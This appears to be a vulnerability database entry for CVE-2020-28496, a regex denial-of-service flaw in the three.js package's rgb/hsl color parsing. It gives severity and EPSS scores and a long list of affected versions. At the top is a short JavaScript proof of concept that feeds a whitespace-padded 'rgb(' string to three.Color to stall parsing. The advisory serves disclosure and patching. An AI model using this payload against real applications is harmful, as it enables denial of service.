Vulnerability Details CVE-2020-28496
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
Exploit prediction scoring system (EPSS) score
EPSS Score 0.014
EPSS Ranking 79.8%
CVSS Severity
CVSS v3 Score 7.5
CVSS v2 Score 5.0
Products affected by CVE-2020-28496
-
cpe:2.3:a:three_project:three:0.100.0
-
cpe:2.3:a:three_project:three:0.101.0
-
cpe:2.3:a:three_project:three:0.101.1
-
cpe:2.3:a:three_project:three:0.102.0
-
cpe:2.3:a:three_project:three:0.102.1
-
cpe:2.3:a:three_project:three:0.103.0
-
cpe:2.3:a:three_project:three:0.104.0
-
cpe:2.3:a:three_project:three:0.105.0
-
cpe:2.3:a:three_project:three:0.105.1
-
cpe:2.3:a:three_project:three:0.105.2
-
cpe:2.3:a:three_project:three:0.106.0
-
cpe:2.3:a:three_project:three:0.106.1
-
cpe:2.3:a:three_project:three:0.106.2
-
cpe:2.3:a:three_project:three:0.107.0
-
cpe:2.3:a:three_project:three:0.108.0
-
cpe:2.3:a:three_project:three:0.109.0
-
cpe:2.3:a:three_project:three:0.110.0
-
cpe:2.3:a:three_project:three:0.111.0
-
cpe:2.3:a:three_project:three:0.112.0
-
cpe:2.3:a:three_project:three:0.112.1
-
cpe:2.3:a:three_project:three:0.113.0
-
cpe:2.3:a:three_project:three:0.113.1
-
cpe:2.3:a:three_project:three:0.113.2
-
cpe:2.3:a:three_project:three:0.114.0
-
cpe:2.3:a:three_project:three:0.115.0
-
cpe:2.3:a:three_project:three:0.116.0
-
cpe:2.3:a:three_project:three:0.116.1
-
cpe:2.3:a:three_project:three:0.117.0
-
cpe:2.3:a:three_project:three:0.117.1
-
cpe:2.3:a:three_project:three:0.118.0
-
cpe:2.3:a:three_project:three:0.118.1
-
cpe:2.3:a:three_project:three:0.118.2
-
cpe:2.3:a:three_project:three:0.118.3
-
cpe:2.3:a:three_project:three:0.119.0
-
cpe:2.3:a:three_project:three:0.119.1
-
cpe:2.3:a:three_project:three:0.120.0
-
cpe:2.3:a:three_project:three:0.120.1
-
cpe:2.3:a:three_project:three:0.121.0
-
cpe:2.3:a:three_project:three:0.121.1
-
cpe:2.3:a:three_project:three:0.122.0
-
cpe:2.3:a:three_project:three:0.123.0
-
cpe:2.3:a:three_project:three:0.124.0
-
cpe:2.3:a:three_project:three:0.54.0
-
cpe:2.3:a:three_project:three:0.54.1
-
cpe:2.3:a:three_project:three:0.54.10
-
cpe:2.3:a:three_project:three:0.54.11
-
cpe:2.3:a:three_project:three:0.54.12
-
cpe:2.3:a:three_project:three:0.54.2
-
cpe:2.3:a:three_project:three:0.54.3
-
cpe:2.3:a:three_project:three:0.54.4
-
cpe:2.3:a:three_project:three:0.54.5
-
cpe:2.3:a:three_project:three:0.54.6
-
cpe:2.3:a:three_project:three:0.54.7
-
cpe:2.3:a:three_project:three:0.54.8
-
cpe:2.3:a:three_project:three:0.54.9
-
cpe:2.3:a:three_project:three:0.55.0
-
cpe:2.3:a:three_project:three:0.56.0
-
cpe:2.3:a:three_project:three:0.56.1
-
cpe:2.3:a:three_project:three:0.56.2
-
cpe:2.3:a:three_project:three:0.56.3
-
cpe:2.3:a:three_project:three:0.56.4
-
cpe:2.3:a:three_project:three:0.56.7
-
cpe:2.3:a:three_project:three:0.58.1
-
cpe:2.3:a:three_project:three:0.58.10
-
cpe:2.3:a:three_project:three:0.58.2
-
cpe:2.3:a:three_project:three:0.58.3
-
cpe:2.3:a:three_project:three:0.58.4
-
cpe:2.3:a:three_project:three:0.58.5
-
cpe:2.3:a:three_project:three:0.58.6
-
cpe:2.3:a:three_project:three:0.58.7
-
cpe:2.3:a:three_project:three:0.58.8
-
cpe:2.3:a:three_project:three:0.58.9
-
cpe:2.3:a:three_project:three:0.66.0
-
cpe:2.3:a:three_project:three:0.66.1
-
cpe:2.3:a:three_project:three:0.66.10
-
cpe:2.3:a:three_project:three:0.66.11
-
cpe:2.3:a:three_project:three:0.66.12
-
cpe:2.3:a:three_project:three:0.66.13
-
cpe:2.3:a:three_project:three:0.66.14
-
cpe:2.3:a:three_project:three:0.66.15
-
cpe:2.3:a:three_project:three:0.66.16
-
cpe:2.3:a:three_project:three:0.66.17
-
cpe:2.3:a:three_project:three:0.66.18
-
cpe:2.3:a:three_project:three:0.66.19
-
cpe:2.3:a:three_project:three:0.66.2
-
cpe:2.3:a:three_project:three:0.66.20
-
cpe:2.3:a:three_project:three:0.66.21
-
cpe:2.3:a:three_project:three:0.66.22
-
cpe:2.3:a:three_project:three:0.66.23
-
cpe:2.3:a:three_project:three:0.66.24
-
cpe:2.3:a:three_project:three:0.66.25
-
cpe:2.3:a:three_project:three:0.66.26
-
cpe:2.3:a:three_project:three:0.66.27
-
cpe:2.3:a:three_project:three:0.66.28
-
cpe:2.3:a:three_project:three:0.66.29
-
cpe:2.3:a:three_project:three:0.66.30
-
cpe:2.3:a:three_project:three:0.66.31
-
cpe:2.3:a:three_project:three:0.66.32
-
cpe:2.3:a:three_project:three:0.66.35
-
cpe:2.3:a:three_project:three:0.66.36
-
cpe:2.3:a:three_project:three:0.66.37
-
cpe:2.3:a:three_project:three:0.66.38
-
cpe:2.3:a:three_project:three:0.66.39
-
cpe:2.3:a:three_project:three:0.66.40
-
cpe:2.3:a:three_project:three:0.66.41
-
cpe:2.3:a:three_project:three:0.66.42
-
cpe:2.3:a:three_project:three:0.66.43
-
cpe:2.3:a:three_project:three:0.66.45
-
cpe:2.3:a:three_project:three:0.66.46
-
cpe:2.3:a:three_project:three:0.66.47
-
cpe:2.3:a:three_project:three:0.66.48
-
cpe:2.3:a:three_project:three:0.66.49
-
cpe:2.3:a:three_project:three:0.66.50
-
cpe:2.3:a:three_project:three:0.66.51
-
cpe:2.3:a:three_project:three:0.66.52
-
cpe:2.3:a:three_project:three:0.66.53
-
cpe:2.3:a:three_project:three:0.66.54
-
cpe:2.3:a:three_project:three:0.66.55
-
cpe:2.3:a:three_project:three:0.66.56
-
cpe:2.3:a:three_project:three:0.66.57
-
cpe:2.3:a:three_project:three:0.66.58
-
cpe:2.3:a:three_project:three:0.66.59
-
cpe:2.3:a:three_project:three:0.66.6
-
cpe:2.3:a:three_project:three:0.66.60
-
cpe:2.3:a:three_project:three:0.66.61
-
cpe:2.3:a:three_project:three:0.66.62
-
cpe:2.3:a:three_project:three:0.66.63
-
cpe:2.3:a:three_project:three:0.66.64
-
cpe:2.3:a:three_project:three:0.66.65
-
cpe:2.3:a:three_project:three:0.66.66
-
cpe:2.3:a:three_project:three:0.66.67
-
cpe:2.3:a:three_project:three:0.66.68
-
cpe:2.3:a:three_project:three:0.66.69
-
cpe:2.3:a:three_project:three:0.66.7
-
cpe:2.3:a:three_project:three:0.66.70
-
cpe:2.3:a:three_project:three:0.66.71
-
cpe:2.3:a:three_project:three:0.66.72
-
cpe:2.3:a:three_project:three:0.66.73
-
cpe:2.3:a:three_project:three:0.66.74
-
cpe:2.3:a:three_project:three:0.66.75
-
cpe:2.3:a:three_project:three:0.66.76
-
cpe:2.3:a:three_project:three:0.66.77
-
cpe:2.3:a:three_project:three:0.66.78
-
cpe:2.3:a:three_project:three:0.66.79
-
cpe:2.3:a:three_project:three:0.66.8
-
cpe:2.3:a:three_project:three:0.66.80
-
cpe:2.3:a:three_project:three:0.66.81
-
cpe:2.3:a:three_project:three:0.66.82
-
cpe:2.3:a:three_project:three:0.66.83
-
cpe:2.3:a:three_project:three:0.66.84
-
cpe:2.3:a:three_project:three:0.66.85
-
cpe:2.3:a:three_project:three:0.66.86
-
cpe:2.3:a:three_project:three:0.66.87
-
cpe:2.3:a:three_project:three:0.66.88
-
cpe:2.3:a:three_project:three:0.66.89
-
cpe:2.3:a:three_project:three:0.66.9
-
cpe:2.3:a:three_project:three:0.66.90
-
cpe:2.3:a:three_project:three:0.66.91
-
cpe:2.3:a:three_project:three:0.66.92
-
cpe:2.3:a:three_project:three:0.66.93
-
cpe:2.3:a:three_project:three:0.66.94
-
cpe:2.3:a:three_project:three:0.66.95
-
cpe:2.3:a:three_project:three:0.66.96
-
cpe:2.3:a:three_project:three:0.66.97
-
cpe:2.3:a:three_project:three:0.67.0
-
cpe:2.3:a:three_project:three:0.68.0
-
cpe:2.3:a:three_project:three:0.68.86
-
cpe:2.3:a:three_project:three:0.68.87
-
cpe:2.3:a:three_project:three:0.69.0
-
cpe:2.3:a:three_project:three:0.70.0
-
cpe:2.3:a:three_project:three:0.70.1
-
cpe:2.3:a:three_project:three:0.71.0
-
cpe:2.3:a:three_project:three:0.71.1
-
cpe:2.3:a:three_project:three:0.72.0
-
cpe:2.3:a:three_project:three:0.73.0
-
cpe:2.3:a:three_project:three:0.73.1
-
cpe:2.3:a:three_project:three:0.73.2
-
cpe:2.3:a:three_project:three:0.74.0
-
cpe:2.3:a:three_project:three:0.75.0
-
cpe:2.3:a:three_project:three:0.76.1
-
cpe:2.3:a:three_project:three:0.77.0
-
cpe:2.3:a:three_project:three:0.77.1
-
cpe:2.3:a:three_project:three:0.78.0
-
cpe:2.3:a:three_project:three:0.79.0
-
cpe:2.3:a:three_project:three:0.80.0
-
cpe:2.3:a:three_project:three:0.80.1
-
cpe:2.3:a:three_project:three:0.81.0
-
cpe:2.3:a:three_project:three:0.81.1
-
cpe:2.3:a:three_project:three:0.81.2
-
cpe:2.3:a:three_project:three:0.82.0
-
cpe:2.3:a:three_project:three:0.82.1
-
cpe:2.3:a:three_project:three:0.83.0
-
cpe:2.3:a:three_project:three:0.84.0
-
cpe:2.3:a:three_project:three:0.85.0
-
cpe:2.3:a:three_project:three:0.85.1
-
cpe:2.3:a:three_project:three:0.85.2
-
cpe:2.3:a:three_project:three:0.86.0
-
cpe:2.3:a:three_project:three:0.87.0
-
cpe:2.3:a:three_project:three:0.87.1
-
cpe:2.3:a:three_project:three:0.88.0
-
cpe:2.3:a:three_project:three:0.89.0
-
cpe:2.3:a:three_project:three:0.90.0
-
cpe:2.3:a:three_project:three:0.91.0
-
cpe:2.3:a:three_project:three:0.92.0
-
cpe:2.3:a:three_project:three:0.93.0
-
cpe:2.3:a:three_project:three:0.94.0
-
cpe:2.3:a:three_project:three:0.95.0
-
cpe:2.3:a:three_project:three:0.96.0
-
cpe:2.3:a:three_project:three:0.97.0
-
cpe:2.3:a:three_project:three:0.98.0
-
cpe:2.3:a:three_project:three:0.99.0